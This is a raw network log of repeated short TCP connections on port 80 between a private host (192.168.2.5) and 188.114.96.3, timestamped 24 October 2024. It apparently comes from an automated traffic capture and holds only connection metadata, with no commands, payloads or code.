Oct 24, 2024 17:03:06.224879980 CEST	49987	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:06.226603031 CEST	49987	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:06.232148886 CEST	80	49987	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:06.232215881 CEST	49987	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:06.237970114 CEST	80	49987	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:07.269582033 CEST	80	49987	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:07.269901991 CEST	49987	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:07.271019936 CEST	80	49987	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:07.271081924 CEST	49987	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:07.280783892 CEST	80	49987	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:07.405340910 CEST	49990	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:07.411078930 CEST	80	49990	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:07.411170006 CEST	49990	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:07.412898064 CEST	49990	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:07.418430090 CEST	80	49990	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:07.418539047 CEST	49990	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:07.424130917 CEST	80	49990	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:08.761451006 CEST	80	49990	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:08.761558056 CEST	49990	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:08.764221907 CEST	80	49990	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:08.764281988 CEST	49990	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:08.767098904 CEST	80	49990	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:08.905703068 CEST	49995	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:08.911619902 CEST	80	49995	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:08.911731005 CEST	49995	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:08.914410114 CEST	49995	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:08.919785023 CEST	80	49995	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:08.919859886 CEST	49995	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:08.925288916 CEST	80	49995	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:11.602705002 CEST	80	49995	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:11.602828979 CEST	49995	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:11.604887009 CEST	80	49995	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:11.604948997 CEST	49995	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:11.609452963 CEST	80	49995	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:11.763237953 CEST	50002	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:11.768953085 CEST	80	50002	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:11.769036055 CEST	50002	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:11.772185087 CEST	50002	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:11.777674913 CEST	80	50002	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:11.777745008 CEST	50002	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:11.783238888 CEST	80	50002	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:15.147119999 CEST	80	50002	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:15.147284031 CEST	50002	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:15.148057938 CEST	80	50002	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:15.148121119 CEST	50002	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:15.153009892 CEST	80	50002	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:15.294817924 CEST	50010	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:15.302089930 CEST	80	50010	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:15.302201986 CEST	50010	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:15.303961992 CEST	50010	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:15.309979916 CEST	80	50010	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:15.310030937 CEST	50010	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:15.315538883 CEST	80	50010	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:16.206479073 CEST	80	50010	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:16.206577063 CEST	50010	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:16.208772898 CEST	80	50010	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:16.208823919 CEST	50010	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:16.212369919 CEST	80	50010	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:16.339648008 CEST	50013	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:16.345279932 CEST	80	50013	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:16.345459938 CEST	50013	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:16.347213030 CEST	50013	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:16.352617979 CEST	80	50013	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:16.352682114 CEST	50013	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:16.358143091 CEST	80	50013	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:17.263499022 CEST	80	50013	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:17.263597012 CEST	50013	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:17.265630960 CEST	80	50013	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:17.265682936 CEST	50013	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:17.269422054 CEST	80	50013	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:17.405097961 CEST	50019	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:17.411833048 CEST	80	50019	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:17.411936998 CEST	50019	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:17.413908958 CEST	50019	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:17.420254946 CEST	80	50019	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:17.420331001 CEST	50019	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:17.425986052 CEST	80	50019	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:18.463715076 CEST	80	50019	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:18.465527058 CEST	80	50019	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:18.465605974 CEST	50019	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:18.475212097 CEST	50019	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:18.480623960 CEST	80	50019	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:18.606939077 CEST	50022	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:18.612728119 CEST	80	50022	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:18.612832069 CEST	50022	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:18.614675999 CEST	50022	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:18.620148897 CEST	80	50022	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:18.620368958 CEST	50022	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:18.625885963 CEST	80	50022	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:19.665740013 CEST	80	50022	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:19.665854931 CEST	50022	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:19.669122934 CEST	80	50022	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:19.669183969 CEST	50022	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:19.671515942 CEST	80	50022	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:19.816500902 CEST	50023	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:19.822324038 CEST	80	50023	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:19.822418928 CEST	50023	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:19.824379921 CEST	50023	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:19.829727888 CEST	80	50023	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:19.829824924 CEST	50023	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:19.835505009 CEST	80	50023	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:20.770615101 CEST	80	50023	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:20.770740032 CEST	50023	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:20.773505926 CEST	80	50023	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:20.773572922 CEST	50023	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:20.776247978 CEST	80	50023	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:20.909378052 CEST	50024	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:20.915057898 CEST	80	50024	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:20.915148020 CEST	50024	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:20.917121887 CEST	50024	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:20.922571898 CEST	80	50024	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:20.922651052 CEST	50024	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:20.927978992 CEST	80	50024	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:21.809870958 CEST	80	50024	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:21.810045958 CEST	50024	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:21.811587095 CEST	80	50024	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:21.811656952 CEST	50024	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:21.815599918 CEST	80	50024	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:21.958811998 CEST	50025	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:21.964525938 CEST	80	50025	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:21.964607000 CEST	50025	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:21.966496944 CEST	50025	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:21.973083973 CEST	80	50025	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:21.973153114 CEST	50025	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:21.979825020 CEST	80	50025	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:23.173033953 CEST	80	50025	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:23.173240900 CEST	50025	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:23.175570965 CEST	80	50025	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:23.175632954 CEST	50025	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:23.178817987 CEST	80	50025	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:23.312453032 CEST	50026	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:23.318016052 CEST	80	50026	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:23.318120956 CEST	50026	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:23.319847107 CEST	50026	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:23.325551033 CEST	80	50026	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:23.325611115 CEST	50026	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:23.331168890 CEST	80	50026	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:24.271332979 CEST	80	50026	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:24.271557093 CEST	50026	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:24.273581028 CEST	80	50026	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:24.273638964 CEST	50026	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:24.277018070 CEST	80	50026	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:24.408117056 CEST	50027	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:24.414001942 CEST	80	50027	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:24.414104939 CEST	50027	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:24.415819883 CEST	50027	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:24.421417952 CEST	80	50027	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:24.421551943 CEST	50027	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:24.427033901 CEST	80	50027	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:26.405299902 CEST	80	50027	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:26.405617952 CEST	50027	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:26.408942938 CEST	80	50027	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:26.409012079 CEST	50027	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:26.411089897 CEST	80	50027	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:26.557508945 CEST	50028	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:26.563127995 CEST	80	50028	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:26.563227892 CEST	50028	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:26.566142082 CEST	50028	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:26.571599007 CEST	80	50028	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:26.571665049 CEST	50028	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:26.578181982 CEST	80	50028	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:29.670588970 CEST	80	50028	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:29.670903921 CEST	50028	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:29.672871113 CEST	80	50028	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:29.672936916 CEST	50028	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:29.677638054 CEST	80	50028	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:29.828085899 CEST	50029	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:29.946113110 CEST	80	50029	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:29.946271896 CEST	50029	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:29.949460983 CEST	50029	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:29.956207037 CEST	80	50029	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:29.956285000 CEST	50029	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:29.962996006 CEST	80	50029	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:30.974685907 CEST	80	50029	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:30.974836111 CEST	50029	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:30.976142883 CEST	80	50029	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:30.976197958 CEST	50029	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:30.980283022 CEST	80	50029	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:31.115200043 CEST	50030	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:31.123058081 CEST	80	50030	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:31.123183966 CEST	50030	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:31.126353025 CEST	50030	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:31.134687901 CEST	80	50030	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:31.134751081 CEST	50030	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:31.142592907 CEST	80	50030	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:32.096904039 CEST	80	50030	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:32.097070932 CEST	50030	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:32.099083900 CEST	80	50030	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:32.099131107 CEST	50030	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:32.103056908 CEST	80	50030	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:32.248470068 CEST	50031	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:32.254194021 CEST	80	50031	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:32.254358053 CEST	50031	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:32.256139040 CEST	50031	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:32.261820078 CEST	80	50031	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:32.261893034 CEST	50031	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:32.267545938 CEST	80	50031	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:33.257147074 CEST	80	50031	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:33.257287025 CEST	50031	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:33.259617090 CEST	80	50031	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:33.259677887 CEST	50031	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:33.262857914 CEST	80	50031	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:33.451625109 CEST	50032	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:33.457848072 CEST	80	50032	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:33.458000898 CEST	50032	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:33.459758997 CEST	50032	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:33.465616941 CEST	80	50032	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:33.465688944 CEST	50032	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:33.471265078 CEST	80	50032	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:34.906884909 CEST	80	50032	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:34.907114983 CEST	50032	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:34.910129070 CEST	80	50032	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:34.910187960 CEST	50032	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:34.913153887 CEST	80	50032	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:35.045720100 CEST	50033	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:35.051712990 CEST	80	50033	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:35.051800966 CEST	50033	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:35.053550005 CEST	50033	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:35.059216022 CEST	80	50033	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:35.059299946 CEST	50033	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:35.064855099 CEST	80	50033	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:36.731468916 CEST	80	50033	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:36.731689930 CEST	50033	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:36.734040022 CEST	80	50033	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:36.734102011 CEST	50033	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:36.737557888 CEST	80	50033	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:36.874309063 CEST	50034	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:36.879828930 CEST	80	50034	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:36.879925013 CEST	50034	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:36.881917953 CEST	50034	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:36.887252092 CEST	80	50034	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:36.887346983 CEST	50034	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:36.892798901 CEST	80	50034	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:38.767467022 CEST	80	50034	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:38.767571926 CEST	50034	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:38.769318104 CEST	80	50034	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:38.769375086 CEST	50034	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:38.773123980 CEST	80	50034	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:38.908828020 CEST	50035	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:38.914343119 CEST	80	50035	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:38.914412022 CEST	50035	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:38.916393995 CEST	50035	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:38.921791077 CEST	80	50035	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:38.921832085 CEST	50035	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:38.927814960 CEST	80	50035	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:40.378551006 CEST	80	50035	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:40.378664970 CEST	50035	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:40.379678011 CEST	80	50035	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:40.379731894 CEST	50035	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:40.384388924 CEST	80	50035	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:40.514801025 CEST	50036	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:40.521003008 CEST	80	50036	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:40.521090984 CEST	50036	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:40.522819996 CEST	50036	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:40.765352964 CEST	50036	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:40.811348915 CEST	80	50036	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:40.811371088 CEST	80	50036	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:40.811482906 CEST	50036	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:40.817619085 CEST	80	50036	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:41.723603010 CEST	80	50036	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:41.723871946 CEST	50036	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:41.726599932 CEST	80	50036	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:41.726679087 CEST	50036	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:41.729284048 CEST	80	50036	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:41.868463039 CEST	50037	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:41.875293016 CEST	80	50037	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:41.875438929 CEST	50037	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:41.877525091 CEST	50037	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:41.883179903 CEST	80	50037	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:41.883239985 CEST	50037	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:41.889024973 CEST	80	50037	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:43.222179890 CEST	80	50037	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:43.222325087 CEST	50037	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:43.224864960 CEST	80	50037	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:43.224936962 CEST	50037	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:43.227866888 CEST	80	50037	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:43.362646103 CEST	50038	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:43.368315935 CEST	80	50038	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:43.368443966 CEST	50038	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:43.370507002 CEST	50038	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:43.376054049 CEST	80	50038	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:43.376183987 CEST	50038	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:43.381587029 CEST	80	50038	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:44.266699076 CEST	80	50038	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:44.266808987 CEST	50038	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:44.268152952 CEST	80	50038	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:44.268208027 CEST	50038	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:44.272391081 CEST	80	50038	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:44.463329077 CEST	50039	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:44.469194889 CEST	80	50039	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:44.469367027 CEST	50039	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:44.471126080 CEST	50039	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:44.476594925 CEST	80	50039	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:44.476667881 CEST	50039	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:44.482093096 CEST	80	50039	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:45.899514914 CEST	80	50039	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:45.899764061 CEST	50039	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:45.902086973 CEST	80	50039	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:45.902169943 CEST	50039	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:45.907115936 CEST	80	50039	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:46.066220999 CEST	50040	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:46.072844982 CEST	80	50040	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:46.072949886 CEST	50040	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:46.075936079 CEST	50040	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:46.083482027 CEST	80	50040	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:46.083585024 CEST	50040	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:46.091187954 CEST	80	50040	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:49.446890116 CEST	80	50040	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:49.447134972 CEST	50040	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:49.449605942 CEST	80	50040	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:49.449680090 CEST	50040	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:49.452542067 CEST	80	50040	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:49.591639042 CEST	50041	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:49.597208977 CEST	80	50041	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:49.597332954 CEST	50041	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:49.599083900 CEST	50041	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:49.605381966 CEST	80	50041	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:49.605447054 CEST	50041	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:49.610898972 CEST	80	50041	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:51.258519888 CEST	80	50041	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:51.258796930 CEST	50041	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:51.259748936 CEST	80	50041	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:51.259848118 CEST	50041	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:51.264590979 CEST	80	50041	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:51.407011032 CEST	50042	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:51.412539005 CEST	80	50042	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:51.412636042 CEST	50042	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:51.414366961 CEST	50042	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:51.419656038 CEST	80	50042	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:51.419744015 CEST	50042	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:51.425148964 CEST	80	50042	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:52.944350958 CEST	80	50042	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:52.944484949 CEST	80	50042	188.114.96.3	192.168.2.5
